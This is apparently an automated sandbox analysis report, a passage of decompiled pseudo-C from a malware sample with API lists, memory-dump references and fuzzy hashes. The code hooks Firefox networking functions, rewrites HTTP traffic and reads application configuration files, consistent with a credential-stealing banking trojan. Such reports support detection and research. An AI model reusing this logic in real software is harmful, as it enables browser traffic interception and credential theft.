        				if((_a20 & 0x00000004) != 0) {
        					_t18 = _t18 | 0x00800000;
        				}
        				_t30 = "POST";
        				if((_a20 & 0x00000001) == 0) {
        					_t30 = "GET";
        				}
        				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0,  &E00422388, _t18, 0);
        				if(_t32 == 0) {
        					L15:
        					return 0;
        				} else {
        					if(_t29 == 0) {
        						_push(0x13);
        						_t21 = "Connection: close\r\n";
        						_pop(0);
        					} else {
        						_t21 = 0;
        					}
        					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
        						L14:
        						InternetCloseHandle(_t32);
        						goto L15;
        					} else {
        						_a20 = _a20 & 0x00000000;
        						_a8 = 4;
        						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
        							goto L14;
        						} else {
        							return _t32;
        						}
        					}
        				}
        			}

        APIs
        • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422388,8404F700,00000000), ref: 0040DEF2
        • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 0040DF19
        • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 0040DF3E
        • InternetCloseHandle.WININET(00000000), ref: 0040DF56
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
        • String ID: Connection: close$GET$HTTP/1.1$POST
        • API String ID: 3080274660-1621676011
        • Opcode ID: 8a2bb9a8b4b0c14ec855e348a02c7b775db599299af397e8d2f36589d023031d
        • Instruction ID: 19b1cb25b356854eb85ea28bc17723a5f9eeca6665aed3e8c77da6be20528d59
        • Opcode Fuzzy Hash: 8a2bb9a8b4b0c14ec855e348a02c7b775db599299af397e8d2f36589d023031d
        • Instruction Fuzzy Hash: 4D118E3161020A6BEB119E90DC45FEB3A98AB14754F108036BF06B92E0DBB9D91887EC
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E0041D672(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
        				void* __ebx;
        				_Unknown_base(*)()* _t4;
        				void* _t9;
        				void* _t10;
        				void* _t11;
        				void* _t12;
        
        				_t12 = __edx;
        				_t11 = __ecx;
        				 *0x422348 = GetProcAddress(__edi, "PR_OpenTCPSocket");
        				 *0x422358 = GetProcAddress(__edi, "PR_Close");
        				 *0x422368 = GetProcAddress(__edi, "PR_Read");
        				_t4 = GetProcAddress(__edi, "PR_Write");
        				_push(0x422348);
        				_t9 = 4;
        				 *0x422378 = _t4;
        				_t10 = E0041D3AA(_t9, _t11, _t12);
        				if(_t10 != 0) {
        					E00405009(__edi,  *0x422350,  *0x422360,  *0x422370,  *0x422380);
        				}
        				return _t10;
        			}

        APIs
        • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 0041D680
        • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0041D68D
        • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0041D69A
        • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0041D6A7
          • Part of subcall function 0041D3AA: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,0001FE38,?,?,0041D670,00422008,00000000,00412D29), ref: 0041D3E1
          • Part of subcall function 00405009: InitializeCriticalSection.KERNEL32(004223C0,0001FEBC,0041D6E0,00422348), ref: 0040501F
          • Part of subcall function 00405009: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040505B
          • Part of subcall function 00405009: GetProcAddress.KERNEL32(PR_SetError), ref: 0040506D
          • Part of subcall function 00405009: GetProcAddress.KERNEL32(PR_GetError), ref: 0040507F
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$AllocCriticalInitializeSectionVirtual
        • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
        • API String ID: 1833644279-3954199073
        • Opcode ID: 76d6eaa55fd178d4858bc49284eed6c96c74ffaa6bda723e920ede1a6de62429
        • Instruction ID: 9fc0deac0ac53d3c63d32d0e64b98c87ebb9b667efab483fdc9079f608df1d5c
        • Opcode Fuzzy Hash: 76d6eaa55fd178d4858bc49284eed6c96c74ffaa6bda723e920ede1a6de62429
        • Instruction Fuzzy Hash: A3F090B1F803107ACB20AB756D45E663F78B785B603A4003BB904A31B0D2FE4042DA5C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			E004057F8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
        				char _v20;
        				void* _v24;
        				void* _v28;
        				char _v36;
        				char _v40;
        				signed int _v44;
        				void* _v48;
        				signed int _v52;
        				void* _v56;
        				intOrPtr _v60;
        				void* _v72;
        				void* _v80;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* _t99;
        				signed int _t100;
        				signed int _t101;
        				intOrPtr _t103;
        				void* _t104;
        				signed int _t107;
        				signed int _t108;
        				signed int _t110;
        				intOrPtr _t119;
        				void* _t131;
        				signed int _t139;
        				void* _t149;
        				struct _CRITICAL_SECTION* _t153;
        				intOrPtr _t155;
        				signed int _t168;
        				signed int _t174;
        				char _t176;
        				void* _t177;
        				intOrPtr _t179;
        				void* _t182;
        				signed int _t183;
        				intOrPtr _t186;
        				void* _t188;
        				signed int _t189;
        				void* _t191;
        				void* _t192;
        				void* _t193;
        				signed int _t195;
        				void* _t197;
        				void* _t199;
        
        				_t197 = (_t195 & 0xfffffff8) - 0x34;
        				_t99 = E004132A1();
        				_t179 = _a4;
        				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
        					L40:
        					_t100 =  *0x4223e4(_t179, _a8, _a12);
        					goto L41;
        				} else {
        					_t153 = 0x4223c0;
        					EnterCriticalSection(0x4223c0);
        					_t101 = L00404B96(_t179);
        					if(_t101 == 0xffffffff) {
        						L39:
        						LeaveCriticalSection(_t153);
        						goto L40;
        					}
        					_t103 = _t101 * 0x38 +  *0x4223dc;
        					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
        						L32:
        						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
        						_t85 = _t103 + 0x2c; // -4334512
        						_t173 = _t85;
        						__eflags = _a12 - _t182;
        						_t183 =  <  ? _a12 : _t182;
        						_t104 = E0040C1FE(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
        						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
        						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
        						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
        							E0040C275(E0040C1C2( *_t173), _t173, 0, 0xc);
        						}
        						LeaveCriticalSection(_t153);
        						_t100 = _t183;
        						L41:
        						return _t100;
        					}
        					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
        						goto L39;
        					}
        					LeaveCriticalSection(0x4223c0);
        					_t107 =  *0x4223e4(_t179, _a8, _a12);
        					_t199 = _t197 + 0xc;
        					_v52 = _t107;
        					if(_t107 <= 0xffffffff) {
        						L38:
        						_t100 = _v52;
        						goto L41;
        					}
        					EnterCriticalSection(0x4223c0);
        					_t108 = L00404B96(_t179);
        					_t174 = _t108;
        					if(_t174 == 0xffffffff) {
        						L35:
        						_push(8);
        						_push(0xffffe890);
        						L36:
        						 *0x4223bc();
        						_v52 = _v52 | 0xffffffff;
        						L37:
        						LeaveCriticalSection(_t153);
        						goto L38;
        					}
        					_t168 = _v52;
        					if(_t168 == 0) {
        						L11:
        						_t176 = _t174 * 0x38 +  *0x4223dc;
        						_v36 = _t176;
        						if(_t168 > 0) {
        							E0040C1FE( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
        							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
        						}
        						_t110 = E0040541C(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
        						_v52 = _t110;
        						if(_t110 == 1) {
        							_t119 = E004055C6( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
        							_v60 = _t119;
        							if(_t119 == 1) {
        								if(E00415547( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
        									_t155 = _v40;
        									_t186 = E0040C192( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
        									_v40 = _t186;
        									if(_t186 != 0) {
        										_t131 = E0040C1FE(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
        										_push(_t155);
        										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
        											E0040C96B(_t199 + 0x28);
        											_t188 = E00411165(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
        											E0040C1FE(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
        											_t189 = _t188 + _t155;
        											__eflags = _t189;
        										} else {
        											_push("%x\r\n");
        											_t191 = _t186 + _t131;
        											_t177 = 0xd;
        											_t192 = _t191 + E0040CEF9(_t131, _t177, _t191);
        											E0040C1FE(_t192, _v48, _t155);
        											_t193 = _t192 + _t155;
        											E0040C1FE(_t193, "\r\n0\r\n\r\n", 7);
        											_t176 = _v60;
        											_t189 = _t193 + 7;
        										}
        										_t137 =  *((intOrPtr*)(_t176 + 0x18));
        										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
        											_t189 = _t189 + E0040C1FE(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
        										}
        										E0040C1C2( *((intOrPtr*)(_t176 + 0x14)));
        										_t139 = _v44;
        										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
        										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
        									}
        								}
        								_v44 = _v44 | 0xffffffff;
        								E0040C1C2(_v48);
        							}
        							_t153 = 0x4223c0;
        						}
        						if(_v52 <= 0) {
        							L29:
        							if(__eflags == 0) {
        								L31:
        								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
        								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
        								 *((intOrPtr*)(_t176 + 0x34)) = 0;
        								 *((intOrPtr*)(_t176 + 0x14)) = 0;
        								 *((intOrPtr*)(_t176 + 0x18)) = 0;
        								E00415A65( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
        								_t103 = _v40;
        								 *((intOrPtr*)(_t176 + 0x10)) = 0;
        								 *((intOrPtr*)(_t176 + 0xc)) = 0;
        								goto L32;
        							}
        							__eflags = _v44 - 0xffffffff;
        							if(_v44 != 0xffffffff) {
        								goto L37;
        							}
        							goto L31;
        						} else {
        							if(_v44 != 0) {
        								__eflags = _v52;
        								goto L29;
        							}
        							_push(0);
        							_push(0xffffe892);
        							goto L36;
        						}
        					}
        					_t149 = _t108 * 0x38 +  *0x4223dc;
        					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
        					_t11 = _t149 + 0x14; // -4334536
        					if(E0040C14D( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
        						goto L35;
        					}
        					_t168 = _v52;
        					goto L11;
        				}
        			}

        APIs
          • Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9
        • EnterCriticalSection.KERNEL32(004223C0), ref: 00405834
        • LeaveCriticalSection.KERNEL32(004223C0), ref: 00405862
        • EnterCriticalSection.KERNEL32(004223C0), ref: 00405886
        • LeaveCriticalSection.KERNEL32(004223C0,00000000,?,00000000), ref: 00405AC9
        • LeaveCriticalSection.KERNEL32(004223C0), ref: 00405AE8
          • Part of subcall function 00411165: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-004223DC,?,00000000), ref: 004111BF
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        • LeaveCriticalSection.KERNEL32(004223C0), ref: 00405AF5
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
        • String ID: 0$%x$Content-Length
        • API String ID: 4067213518-3838797520
        • Opcode ID: 7dd0451eeeb07f0fce7595bca93f5f37d2354d49f55ddbda274f15df770f06a9
        • Instruction ID: 3961b2f38d926f43c6ec9f1214284615276e42e29bfe455c3f34afaa9866a838
        • Opcode Fuzzy Hash: 7dd0451eeeb07f0fce7595bca93f5f37d2354d49f55ddbda274f15df770f06a9
        • Instruction Fuzzy Hash: D0918E72500612AFCB10EF25C98195BBBB5FF84314F044B2AF850A72E2D778E955CF99
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E00415547(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
        				char _v540;
        				char _v800;
        				char _v804;
        				char _v860;
        				struct _SYSTEMTIME _v876;
        				char _v900;
        				signed int _v968;
        				signed int _v980;
        				intOrPtr _v984;
        				intOrPtr _v988;
        				char* _v992;
        				char _v996;
        				void* _v1008;
        				struct _SYSTEMTIME _v1028;
        				signed int _v1032;
        				short _v1036;
        				signed short* _v1040;
        				signed int _v1044;
        				intOrPtr* _v1048;
        				signed int _v1052;
        				signed int _v1056;
        				signed int _v1060;
        				signed int _v1064;
        				char _v1068;
        				intOrPtr _v1072;
        				char _v1076;
        				intOrPtr _v1080;
        				intOrPtr _v1084;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t158;
        				signed int _t159;
        				intOrPtr _t160;
        				signed int _t168;
        				void* _t188;
        				void* _t199;
        				signed int _t211;
        				signed int _t215;
        				signed int _t218;
        				signed char _t222;
        				signed int _t224;
        				void* _t227;
        				void* _t228;
        				signed int _t229;
        				signed int _t230;
        				signed int _t240;
        				void* _t242;
        				signed int _t250;
        				intOrPtr* _t254;
        				signed int _t255;
        				intOrPtr _t258;
        				short* _t261;
        				void* _t280;
        				intOrPtr* _t286;
        				signed int _t291;
        				long _t294;
        				signed short* _t296;
        				signed short* _t298;
        				signed int _t301;
        				intOrPtr* _t303;
        				signed int _t307;
        				void* _t309;
        
        				_t309 = (_t307 & 0xfffffff8) - 0x424;
        				_v1032 = _v1032 & 0x00000000;
        				if(__eax == 0) {
        					L52:
        					asm("sbb eax, eax");
        					return  ~0x00000000;
        				} else {
        					_t286 = __ecx + 0x10;
        					_v1048 = _t286;
        					_v1028.wDayOfWeek = __eax;
        					do {
        						_t258 =  *_t286;
        						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
        						_v1028.wHour = _t279;
        						if(_t258 == 0) {
        							_t254 = _a8;
        							L6:
        							_t259 =  *(_t286 + 4);
        							_v1052 = _v1052 & 0x00000000;
        							_v1064 = _v1064 & 0x00000000;
        							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
        							_v1028.wSecond = _t158;
        							if(_t259 >= _t158) {
        								L35:
        								_t159 =  *(_t286 - 0x10);
        								_t294 = 0;
        								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
        									if((_t159 & 0x00000200) == 0) {
        										_t255 = E0040C402(_t159 | 0xffffffff, 0, _a4);
        										__eflags = _t255;
        										if(_t255 != 0) {
        											_t188 = 9;
        											E004128DB(_t188,  &_v996);
        											_push(_v1052);
        											E00409404(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
        											_t309 = _t309 + 0x18;
        											E0040C1C2(_t255);
        										}
        									} else {
        										_t280 = 0x3c;
        										E0040C275( &_v996,  &_v996, 0, _t280);
        										_v992 =  &_v800;
        										_v1008 = _t280;
        										_v988 = 0x103;
        										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
        											GetSystemTime( &_v1028);
        											_t306 =  &_v876;
        											_t199 = 8;
        											E004128DB(_t199,  &_v876);
        											_push(_v1028.wDay & 0x0000ffff);
        											_push(_v1028.wMonth & 0x0000ffff);
        											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
        											_push( &_v804);
        											E0040CEB5( &_v876, 0x104,  &_v540, _t306);
        											_t309 = _t309 + 0x14;
        											E0040925A(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
        											_t286 = _v1084;
        										}
        									}
        									E0040C1C2(_v1052);
        									_t294 = 0;
        								}
        								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
        									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
        										EnterCriticalSection(0x423e54);
        										E0040C1C2( *0x423e6c);
        										_t168 = E0040C620(E0040C1C2( *0x423e70) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
        										 *0x423e6c = _t168;
        										__eflags = _t168 | 0xffffffff;
        										 *0x423e70 = E0040C620(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
        										LeaveCriticalSection(0x423e54);
        										goto L51;
        									}
        									E0041352A( &_v860, _t259, 1,  &_v996);
        									if(E0040D467( &_v900,  *((intOrPtr*)(_t286 - 4)), E0040CCFF( *((intOrPtr*)(_t286 - 4)))) == 0) {
        										goto L51;
        									}
        									_t261 =  &_v860;
        									do {
        										E0040C52A( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
        										_t294 = _t294 + 1;
        										_t261 = _t261 + 4;
        									} while (_t294 < 0x10);
        									 *_t261 = 0;
        									GetLocalTime( &_v876);
        									E00410441(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
        								}
        								goto L51;
        							} else {
        								goto L9;
        								L13:
        								_t279 =  *_t211 & 0x0000ffff;
        								if(_t279 != 4) {
        									_t259 = _t211 + 4;
        									_t218 = E0041486D(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
        									__eflags = _t218;
        									if(_t218 == 0) {
        										L33:
        										if(_v1028.wYear < _v1028.wSecond) {
        											_t259 = _v1028.wYear;
        											L9:
        											_t211 = ( *_t259 & 0x0000ffff) + _t259;
        											_t296 = ( *_t211 & 0x0000ffff) + _t211;
        											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
        											_t279 =  *_t259 & 0x0000ffff;
        											_v1036 = _t259;
        											_v1044 = _t211;
        											_v1040 = _t296;
        											if(( *_t259 & 0x0000ffff) != 4) {
        												goto L11;
        											} else {
        												_v1060 = _v1060 & 0x00000000;
        												goto L13;
        											}
        										}
        										_t286 = _v1048;
        										goto L35;
        									}
        									__eflags =  *_v1036 - 4;
        									_t298 = _v1040;
        									if( *_v1036 != 4) {
        										_t54 =  &_v1056;
        										 *_t54 = _v1056 + _v1060;
        										__eflags =  *_t54;
        									} else {
        										_v1060 = _v1056;
        									}
        									L22:
        									_t259 = _v1056 - _v1060;
        									_t222 =  *(_v1048 - 0x10);
        									_t291 = ( *_t298 & 0x0000ffff) - 4;
        									_v1044 = _t259;
        									if((_t222 & 0x00000004) == 0) {
        										__eflags = _t222 & 0x00000008;
        										if((_t222 & 0x00000008) != 0) {
        											_t224 = E0040C14D(_t259 + _t291 + _v1064 + 2,  &_v1052);
        											__eflags = _t224;
        											if(_t224 != 0) {
        												_t301 = _v1052;
        												__eflags = _t291;
        												if(_t291 != 0) {
        													E0040C1FE(_v1064 + _t301,  &(_v1040[2]), _t291);
        													_t84 =  &_v1076;
        													 *_t84 = _v1076 + _t291;
        													__eflags =  *_t84;
        												}
        												_t279 = _v1044;
        												_t227 = E0040C1FE(_v1064 + _t301,  *_t254 + _v1060, _t279);
        												_t259 = _v1060;
        												__eflags =  *(_t259 - 0x10) & 0x00000100;
        												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
        													_t228 = E00410DE8(_t227, _t279);
        													_t95 =  &_v1068;
        													 *_t95 = _v1068 + _t228;
        													__eflags =  *_t95;
        													_t254 = _a8;
        												} else {
        													_v1064 = _v1064 + _t279;
        												}
        												_t229 = _v1064;
        												 *((char*)(_t229 + _t301)) = 0xa;
        												_t230 = _t229 + 1;
        												__eflags = _t230;
        												_v1064 = _t230;
        												 *((char*)(_t230 + _t301)) = 0;
        											}
        										}
        									} else {
        										_v1036 =  *_a12 - _t259 + _t291;
        										_t240 = E0040C192( *_a12 - _t259 + _t291);
        										_v1044 = _t240;
        										if(_t240 != 0) {
        											_t279 = _v1060;
        											_t242 = E0040C1FE(E0040C1FE(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
        											_t303 = _a12;
        											_t259 =  *_t254 + _v1080;
        											E0040C1FE(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
        											E0040C1C2( *_t254);
        											_v1072 = _v1072 + 1;
        											 *_t254 = _v1084;
        											 *_t303 = _v1076;
        										}
        									}
        									goto L33;
        								}
        								if( *_t259 != _t279) {
        									_t250 = _v1060;
        								} else {
        									_t250 =  *_a12;
        								}
        								_v1056 = _t250;
        								goto L22;
        								L11:
        								_t215 = E0041486D(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
        								__eflags = _t215;
        								if(_t215 == 0) {
        									goto L33;
        								}
        								_t298 = _v1040;
        								_t211 = _v1044;
        								_t259 = _v1036;
        								goto L13;
        							}
        						}
        						_v996 = 0x2a3f;
        						_v992 = _t258;
        						_t160 = E0040CCFF(_t258);
        						_t254 = _a8;
        						_v988 = _t160;
        						_v984 =  *_t254;
        						_t279 = _t279 | 0x00000012;
        						_v980 =  *_a12;
        						_v968 = _t279;
        						if(E0040D146( &_v996) != 0) {
        							goto L6;
        						}
        						L51:
        						_t286 = _t286 + 0x1c;
        						_t150 =  &(_v1028.wDayOfWeek);
        						 *_t150 = _v1028.wDayOfWeek - 1;
        						_v1048 = _t286;
        					} while ( *_t150 != 0);
        					goto L52;
        				}
        			}

        APIs
        • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00415830
        • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0041584E
        • GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-004223DC,?,?), ref: 00415968
        • EnterCriticalSection.KERNEL32(00423E54,-004223DC,?,?), ref: 00415994
        • LeaveCriticalSection.KERNEL32(00423E54,?,?), ref: 004159D1
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
        • String ID: ?*$T>B
        • API String ID: 2400141425-1382917818
        • Opcode ID: 83612b068a0c9c4e0531e6a334d26399caa60318d195f706395092e216cafbbb
        • Instruction ID: 9b8ad2ce2d8163684a3bcd8b8ed98e0d6d7ec95a0aa6e8ea9889ce0cd8e05bf2
        • Opcode Fuzzy Hash: 83612b068a0c9c4e0531e6a334d26399caa60318d195f706395092e216cafbbb
        • Instruction Fuzzy Hash: F8E159B1608341DFD710DF69C880AABB7E5FF88714F004A2EF895A7291D738E945CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E00418D21(char* __ecx, char* __edx, void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				intOrPtr _v16;
        				char* _v20;
        				char _v24;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				char _v64;
        				char _v84;
        				char _v108;
        				char _v152;
        				char _v180;
        				char _v252;
        				short _v766;
        				char _v772;
        				short _v1292;
        				void* __edi;
        				void* __esi;
        				void* _t46;
        				void* _t48;
        				void* _t53;
        				void* _t57;
        				void* _t59;
        				void* _t61;
        				void* _t68;
        				void* _t70;
        				void* _t75;
        				WCHAR* _t100;
        				signed int _t101;
        				WCHAR* _t103;
        				char* _t108;
        				intOrPtr _t109;
        				void* _t112;
        				intOrPtr _t125;
        
        				_t99 = __edx;
        				_t98 = __ecx;
        				E0040C275( &_v12,  &_v12, 0, 8);
        				_t46 = 0x6a;
        				E004128DB(_t46,  &_v252);
        				_t48 = 0x6b;
        				E004128DB(_t48,  &_v108);
        				_t100 =  &_v772;
        				_t53 = E004102E6(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
        				if(_t53 != 0xffffffff) {
        					_t115 = _t53;
        					if(_t53 != 0) {
        						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
        						E00418B35(_t99, _t115,  &_v1292,  &_v12);
        						PathRemoveFileSpecW( &_v1292);
        					}
        				}
        				_t101 = 0;
        				if(_v8 != 0) {
        					L14:
        					_t125 = _v8;
        					goto L15;
        				} else {
        					_t57 = 0x6d;
        					E004128DB(_t57,  &_v64);
        					_t59 = 0x6e;
        					E004128DB(_t59,  &_v152);
        					_t108 =  &_v84;
        					_t61 = 0x6f;
        					E004128DB(_t61, _t108);
        					_v24 =  &_v64;
        					_v20 =  &_v152;
        					_v40 = 0x24;
        					_v36 = 0x1a;
        					_v32 = 0x26;
        					_v28 = 0x23;
        					_v16 = _t108;
        					do {
        						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
        						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
        						if(0 == 0) {
        							_t118 = _t109 - 0x24;
        							if(_t109 == 0x24) {
        								E00418AF3(_t118,  &_v772,  &_v12, 0);
        								_v766 = 0;
        							}
        							_t99 =  &_v24;
        							_t98 =  &_v772;
        							E004118EB( &_v772,  &_v24, 0, 3, 2, E00418CD8,  &_v12, 0, 0, 0);
        						}
        						_t101 = _t101 + 1;
        					} while (_t101 < 4);
        					if(_v8 != 0) {
        						L15:
        						if(_t125 <= 0) {
        							return E0040C1C2(_v12);
        						}
        						_push(0xcb);
        						return E00417504(_t99, _v12, 0x70);
        					}
        					_t68 = 0x6a;
        					E004128DB(_t68,  &_v180);
        					_t70 = 0x6c;
        					E004128DB(_t70,  &_v64);
        					_t103 =  &_v772;
        					_t75 = E004102E6(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
        					if(_t75 != 0xffffffff) {
        						_t124 = _t75;
        						if(_t75 != 0) {
        							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
        							E00418AF3(_t124,  &_v1292,  &_v12, 1);
        						}
        					}
        					goto L14;
        				}
        			}

        APIs
          • Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB
        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00418D87
          • Part of subcall function 00418B35: GetPrivateProfileStringW.KERNEL32 ref: 00418B6C
          • Part of subcall function 00418B35: StrStrIW.SHLWAPI(00000001,?), ref: 00418BF4
          • Part of subcall function 00418B35: StrStrIW.SHLWAPI(00000001,?), ref: 00418C05
          • Part of subcall function 00418B35: GetPrivateProfileStringW.KERNEL32 ref: 00418C21
          • Part of subcall function 00418B35: GetPrivateProfileStringW.KERNEL32 ref: 00418C3F
        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000,00000001), ref: 00418DA4
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00418E1A
        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000001), ref: 00418EB7
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
        • String ID: #$$$&
        • API String ID: 1517737059-1941049543
        • Opcode ID: c43fe9b534ac452456a11d9334d8008af798d9465eae7aa871ca7e8b56d6a304
        • Instruction ID: 6f858a0643c4319d6234ce880b71a16506ca758c971b088da8b77b7cdd7cc3c8
        • Opcode Fuzzy Hash: c43fe9b534ac452456a11d9334d8008af798d9465eae7aa871ca7e8b56d6a304
        • Instruction Fuzzy Hash: F9515072E00218AADF10EBA1CC49FDF77BCAB08314F0005ABB508F7181EB789AC58B55
        Uniqueness

